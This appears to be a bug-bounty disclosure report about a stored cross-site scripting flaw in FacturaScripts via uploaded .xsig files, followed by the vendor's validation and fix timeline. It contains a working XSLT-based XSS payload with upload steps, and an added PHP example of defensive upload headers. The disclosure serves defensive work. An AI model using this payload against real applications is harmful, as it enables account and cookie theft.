XSS using .xsig file in neorazorx/facturascripts

Valid

Reported on

May 14th 2022


Description

XSS using an uploaded .xsig file.

Proof of Concept

1. Save this file as test.xsig and upload it to http://localhost/ListAttachedFile

<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet
id ID #REQUIRED>]>
<!-- It works on Chrome/Safari/Edge and IE -->
<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html" doctype-system="&gt;&lt;img src=x onerror=alert(1)&gt;"  />
<xsl:template match="/">
<root/>
</xsl:template>
</xsl:stylesheet>

2. Now view this file in the Chrome browser and see that the XSS is executed.

Impact

XSS allows an attacker to steal the victim's account cookie.
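The PoC only fires when the browser renders the uploaded .xsig file as an XML document and applies its embedded stylesheet. The sketch below is an added example, not FacturaScripts code and not the merged fix: it picks response headers for user-uploaded files so that anything outside a small image allowlist is downloaded instead of rendered. The function name, the allowlist and the sample file names are assumptions.

```php
<?php
// Added example (not project code): response headers for user uploads.

// Hypothetical allowlist: passive formats that may be displayed inline.
const INLINE_SAFE = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
];

function uploadResponseHeaders(string $fileName): array
{
    $ext = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
    // Keep the header value free of quotes, CR/LF and path separators.
    $safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($fileName));

    $headers = [
        // Do not let the browser guess a renderable type from the bytes.
        'X-Content-Type-Options' => 'nosniff',
        // If the response is rendered anyway, scripts and handlers are blocked.
        'Content-Security-Policy' => "default-src 'none'; sandbox",
    ];

    if (array_key_exists($ext, INLINE_SAFE)) {
        $headers['Content-Type'] = INLINE_SAFE[$ext];
        $headers['Content-Disposition'] = 'inline; filename="' . $safeName . '"';
    } else {
        // .xsig, .xml, .svg, .html and every unknown type: force a download
        // with a generic type so no XML/XSLT or HTML processing takes place.
        $headers['Content-Type'] = 'application/octet-stream';
        $headers['Content-Disposition'] = 'attachment; filename="' . $safeName . '"';
    }

    return $headers;
}

// Constructed sample file names.
foreach (['test.xsig', 'logo.PNG', 'notes.html'] as $name) {
    echo $name, "\n";
    foreach (uploadResponseHeaders($name) as $key => $value) {
        echo "  $key: $value\n";
    }
}
```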

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a month ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a month ago
Carlos Garcia validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on f1ca50 a month ago
Carlos Garcia has been awarded the fix bounty
AppRouter.php#L51-L295 has been validated